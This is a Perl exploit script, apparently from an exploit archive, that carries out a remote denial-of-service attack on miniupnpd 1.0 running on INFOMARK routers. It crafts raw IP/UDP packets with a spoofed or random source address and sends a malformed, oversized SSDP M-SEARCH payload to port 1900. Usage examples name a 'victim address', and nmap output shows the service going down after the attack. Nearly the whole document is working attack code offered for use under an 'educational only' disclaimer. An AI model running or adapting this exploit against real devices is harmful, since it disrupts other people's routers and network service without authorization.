MiniUPNPd 1.0 Remote Denial Of Service

`#!/usr/bin/perl  
#  
# miniupnpd/1.0 remote denial of service exploit  
#  
# Copyright 2015 (c) Todor Donev   
# [email protected]  
# http://www.ethical-hacker.org/  
# https://www.facebook.com/ethicalhackerorg  
#  
# The SSDP protocol can discover Plug & Play devices,   
# with uPnP (Universal Plug and Play). SSDP is HTTP   
# like protocol and work with NOTIFY and M-SEARCH   
# methods.   
#  
# See also:   
# CVE-2013-0229   
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229   
# CVE-2013-0230  
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230  
#   
# Tested on  
# Device Name : IMW-C920W  
# Device Manufacturer : INFOMARK (http://infomark.co.kr)  
#   
# These devices are commonly used by Max Telecom, Bulgaria  
#  
# Disclaimer:  
# This or previous program is for Educational  
# purpose ONLY. Do not use it without permission.  
# The usual disclaimer applies, especially the  
# fact that Todor Donev is not liable for any  
# damages caused by direct or indirect use of the  
# information or functionality provided by these  
# programs. The author or any Internet provider  
# bears NO responsibility for content or misuse  
# of these programs or any derivatives thereof.  
# By using these programs you accept the fact  
# that any damage (dataloss, system crash,  
# system compromise, etc.) caused by the use  
# of these programs is not Todor Donev's  
# responsibility.  
#   
# Use at your own risk!  
#  
# See also:  
# SSDP Reflection DDoS Attacks   
# http://tinyurl.com/mqwj6xt  
#  
#######################################  
#  
# # perl miniupnpd.pl  
#   
# [ miniupnpd/1.0 remote denial of service exploit ]  
# [ =============================================== ]  
# [ Usage:   
# [ ./miniupnpd.pl <victim address> <spoofed address>  
# [ Example:  
# [ perl miniupnpd.pl 192.168.1.1 133.73.13.37  
# [ Example:  
# [ perl miniupnpd.pl 192.168.1.1  
# [ =============================================== ]  
# [ 2015 <[email protected]> Todor Donev 2015 ]  
#  
# # nmap -sU 192.168.1.1 -p1900 --script=upnp-info  
#  
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST  
# Nmap scan report for 192.168.1.1  
# Host is up (0.00078s latency).  
# PORT STATE SERVICE  
# 1900/udp open upnp  
# | upnp-info:  
# | 192.168.1.1  
# | Server: 1.0 UPnP/1.0 miniupnpd/1.0  
# | Location: http://192.168.1.1:5000/rootDesc.xml  
# | Webserver: 1.0 UPnP/1.0 miniupnpd/1.0  
# | Name: INFOMARK Router  
# | Manufacturer: INFOMARK  
# | Model Descr: INFOMARK Router  
# | Model Name: INFOMARK Router  
# | Model Version: 1  
# | Name: WANDevice  
# | Manufacturer: MiniUPnP  
# | Model Descr: WAN Device  
# | Model Name: WAN Device  
# | Model Version: 20070228  
# | Name: WANConnectionDevice  
# | Manufacturer: MiniUPnP  
# | Model Descr: MiniUPnP daemon  
# | Model Name: MiniUPnPd  
# |_ Model Version: 20070228  
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED  
#   
# Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds  
#  
# # perl miniupnpd.pl 192.168.1.1  
#  
# [ miniupnpd/1.0 remote denial of service exploit ]  
# [ =============================================== ]  
# [ Target: 192.168.1.1  
# [ Send malformed SSDP packet..  
#  
# # nmap -sU 192.168.1.1 -p1900  
#   
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST  
# Nmap scan report for 192.168.1.1  
# Host is up (0.00085s latency).  
# PORT STATE SERVICE  
# 1900/udp closed upnp // GOOD NIGHT, SWEET PRINCE.... :D  
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED  
#   
# Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds  
#  
#  
# Special thanks to HD Moore ..  
#  
  
use Socket;  
  
if ( $< != 0 ) {  
print "Sorry, must be run as root!\n";  
print "This script use RAW Socket.\n";   
exit;  
}  
  
my $ip_src = (gethostbyname($ARGV[1]))[4];  
my $ip_dst = (gethostbyname($ARGV[0]))[4];  
  
print "\n[ miniupnpd/1.0 remote denial of service exploit ]\n";  
print "[ =============================================== ]\n";  
select(undef, undef, undef, 0.40);  
  
if (!defined $ip_dst) {  
print "[ Usage:\n[ ./$0 <victim address> <spoofed address>\n";  
select(undef, undef, undef, 0.55);  
print "[ Example:\n[ perl $0 192.168.1.1 133.73.13.37\n";  
print "[ Example:\n[ perl $0 192.168.1.1\n";  
print "[ =============================================== ]\n";  
print "[ 2015 <todor.donev\@gmail.com> Todor Donev 2015 ]\n\n";  
exit;  
}  
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;  
setsockopt(RAW, 0, 1, 1) or die $!;  
main();  
  
# Main program  
sub main {  
my $packet;  
  
$packet = iphdr();  
$packet .= udphdr();  
$packet .= payload();  
# b000000m...  
send_packet($packet);  
}  
  
# IP header (Layer 3)  
sub iphdr {  
my $ip_ver = 4; # IP Version 4 (4 bits)  
my $iphdr_len = 5; # IP Header Length (4 bits)  
my $ip_tos = 0; # Differentiated Services (8 bits)  
my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)  
my $ip_frag_id = 0; # Identification Field (16 bits)  
my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)  
my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)  
my $ip_ttl = 255; # IP TTL (8 bits)  
my $ip_proto = 17; # IP Protocol (8 bits)  
my $ip_checksum = 0; # IP Checksum (16 bits)  
my $ip_src=gethostbyname(&randip) if !$ip_src; # IP Source (32 bits)  
# IP Packet construction  
my $iphdr = pack(  
'H2 H2 n n B16 h2 c n a4 a4',  
$ip_ver . $iphdr_len, $ip_tos, $ip_total_len,  
$ip_frag_id, $ip_frag_flag . $ip_frag_offset,  
$ip_ttl, $ip_proto, $ip_checksum,  
$ip_src, $ip_dst  
);  
  
return $iphdr;  
}  
  
# UDP header (Layer 4)  
sub udphdr {  
my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)  
my $udp_dst_port = 1900; # UDP Dest Port (16 btis) (0-65535)  
my $udp_len = 8 + length(payload()); # UDP Length (16 bits) (0-65535)  
my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)  
  
# UDP Packet  
my $udphdr = pack(  
'n n n n',  
$udp_src_port, $udp_dst_port,  
$udp_len, $udp_checksum  
);  
return $udphdr;  
}  
  
# Create SSDP Bomb  
sub payload {  
my $data;  
my $head;  
$data = "M-SEARCH * HTTP\/1.1\\r\\n";  
for (0..1260) { $data .= chr( int(rand(25) + 65) ); }  
my $payload = pack('a' . length($data), $data);  
return $payload;  
}  
  
# Generate random source ip address  
sub randip () {  
srand(time() ^ ($$ + ($$ << 15)));  
my $ipdata;  
$ipdata = join ('.', (int(rand(255)), int(rand(255)), int(rand(255)), int(rand(255)))), "\n";  
my $ipsrc = pack('A' . length($ipdata), rand($ipdata));  
return $ipdata;  
}  
  
# Send the malformed packet  
sub send_packet {  
print "[ Target: $ARGV[0]\n";  
select(undef, undef, undef, 0.30);  
print "[ Send malformed SSDP packet..\n\n";  
send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ip_dst)) or die $!;  
}  
  
  
`